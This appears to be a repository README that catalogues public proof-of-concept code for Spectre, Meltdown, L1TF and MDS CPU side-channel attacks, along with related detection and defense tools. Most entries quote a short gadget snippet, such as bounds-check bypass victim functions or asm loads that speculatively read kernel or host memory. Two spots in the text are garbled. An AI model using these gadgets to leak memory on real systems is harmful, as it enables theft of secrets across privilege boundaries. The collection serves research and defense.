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Collection of Spectre-type, Meltdown-type and MDS-type PoCs

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Collected from existing repos, this repo lists known Spectre-type, Meltdown-type and MDS-type PoCs. PRs are welcome.

If you want to read corresponding codes, please checkout the branch codes.

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1. Collection

1.1 speed47/spectre-meltdown-checker

1.2 mniip/spectre-meltdown-poc

1.3 msmania/microarchitectural-attack

  movzx eax, byte [rcx]
  shl rax, 0Ch
  mov al, byte [rax+rdx]

1.4 adamalston/Meltdown-Spectre

2. Spectre-type

2.1 ErikAugust/spectre.c

void victim_function(size_t x)
	if (x < array1_size)
		temp &= array2[array1[x] * 512];

2.2 lsds/spectre-attack-sgx

void ecall_victim_function(size_t x, uint8_t * array2, unsigned int * outside_array1_size) {
	//if (x < array1_size) {
	if (x < *outside_array1_size) {
		 temp &= array2[array1[x] * 512];

2.3 opsxcq/exploit-cve-2017-5715

void accessPage(int page) {
  int value=0;
  if (page < indexArraySize) {
    value = value & attackArray[indexArray[page] * PAGE_SIZE];

2.4 cgvwzq/spectre

function vul_call(index, sIndex)
        index = index |0;
        sIndex = sIndex |0;
        var arr_size = 0;
        var j = 0;
        junk = probeTable[0]|0;
        // "size" value repeated at different offsets to avoid having to flush it?
        j = (((sIndex << 12) | 0) +  sizeArrayStart)|0;
        arr_size = simpleByteArray[j|0]|0;
        if ((index|0) < (arr_size|0))
            index = simpleByteArray[index|0]|0;
            index = (index << 12)|0;
            index = (index & ((TABLE1_BYTES-1)|0))|0;
            junk = (junk ^ (probeTable[index]|0))|0;

2.5 amosbe/spectre-without-shared-memory

2.6 HexHive/SMoTherSpectre

/* smother gadget */
asm("cmp $0, %%r15;"
    "je MARK;" ::: );
CRC324 CRC322
asm("movl $-1, %%r12d; divl %%r12d;" :::);
asm("lfence;" :::);

2.7 mmxsrup/CVE-2018-3639

2.8 Shuiliusheng/CVE-2018-3639-specter-v4-

void victim_function(size_t idx) {
	unsigned char **memory_slot_slow_ptr = *memory_slot_ptr;
	*memory_slot_slow_ptr = public_key;
	tmp = probe[(*memory_slot)[idx] * 4096];

3. Meltdown-type

3.1 IAIK/meltdown

3.2 feruxmax/meltdown

int speculative_transfer(int div, uint8_t secret)
    uint8_t data = 0;
    int res = 0;

    // rise_exception after delay
    int a=div;
    for(int i=0;i<100000;i++)
    data = a / div;

    // speculative
    res += cache[CACHE_LINE_SIZE*secret];

    return res + data;

3.3 Frichetten/meltdown-spectre-poc

asm __volatile__ (
           ".global __speculative_byte_load_exit \n\t"
           "%=:                              \n"
           "xorq %%rax, %%rax                \n"
           "movb (%[ptr]), %%al              \n"
           "shlq $0xc, %%rax                 \n"
           "jz %=b                           \n"
           "movq (%[buf], %%rax, 1), %%rbx   \n"
           "__speculative_byte_load_exit:     \n"
           "nop                               \n"
           :  [ptr] "r" (ptr), [buf] "r" (buf)
           :  "%rax", "%rbx");

3.4 paboldin/meltdown-exploit

; rcx = kernel address
; rbx = probe array
mov al, byte [rcx]
shl rax, 0xc
jz retry
mov rbx, qword [rbx + rax]

3.5 Semihalf/spectre-meltdown

__attribute__((noinline)) uint8_t bounds_check(uint64_t idx)
	if (idx < array_size) /* no reading outside the array, or is it? */
		return side_effects[base_array[idx] * PAGE_SIZE];
	return 0; /* just return 0 if index is out of range */

3.6 gregvish/l1tf-poc.git

  • Link:
  • Tool: C, ASM
  • Description: Its README explains the concerns to run the PoC, dumping host memory in a guest. The PoC should run on a VM which is compromised by specific codes. It is necessary to break the mapping of the VM to physical address, which may use a brute force method. It mentions that L1TF succeeds to capture secrets in L1 DCache. Otherwise, no meaningful data will be inferred.
    push %rbx
    push %rdi
    push %rsi
    push %rdx

    // Do the illegal access (rdx is ptr param)
    movb (%rdx), %bl
    // Duplicate result to rax
    mov %rbx, %rax

    // calculate our_buffer_lsb offset according to low nibble
    and $0xf, %rax
    shl $0xc, %rax

    // calculate our_buffer_msb offset according to high nibble
    shr $0x4, %rbx
    and $0xf, %rbx
    shl $0xc, %rbx

    // rsi is our_buffer_lsb param
    mov (%rsi, %rax, 1), %rax
    // rdi is our_buffer_msb param
    mov (%rdi, %rbx, 1), %rbx

4. MDS-type

4.1 ZombieLoad

  • Link:
  • Tool: C
  • Description: Besides four ZombieLoad attack scenarios, this repo contains a cacheutils file, which implement the basic elements to construct Flush+Reload attacks, such as the choice of threshold and Flush+Reload function. An embedded disassembly gadget supports accessing address through mov directly.
while (1) {
    // Ensure the kernel mapping refers to a value not in the cache

    // Dereference the kernel address and encode in LUT
    // Not in cache -> reads load buffer entry
    if (!setjmp(trycatch_buf)) {
      maccess(mem + 4096 * target[0]);

4.2 RIDL

5. Related

5.1 oo7

  • Link:
  • Tool: JavaScript, Shell
  • Description: Employ control flow extraction, taint analysis and address analysis at the binary level.

5.2 KleesSpectre

  • Link: [][]
  • Tool: LLVM
  • Description: Employ a symbolic execution tool, klee, to find suspicious gadgets. It should be noted that the author of this tool is the same as oo7. Compared to taint analysis, symbolic execution is a more fine grained approach. The memory locations accessed by a read/write is captured as symbolic expressions over (tainted) input, in�stead of simply maintaining that the location accessed by a read/write is tainted.

5.3 SgxPectre

5.4 speculator

5.5 InvisiSpec

5.6 STT

5.7 SpectreGuard

5.8 willyb321/meltdown-spectre-poc-grabber


Collection of Spectre-type, Meltdown-type and MDS-type PoCs







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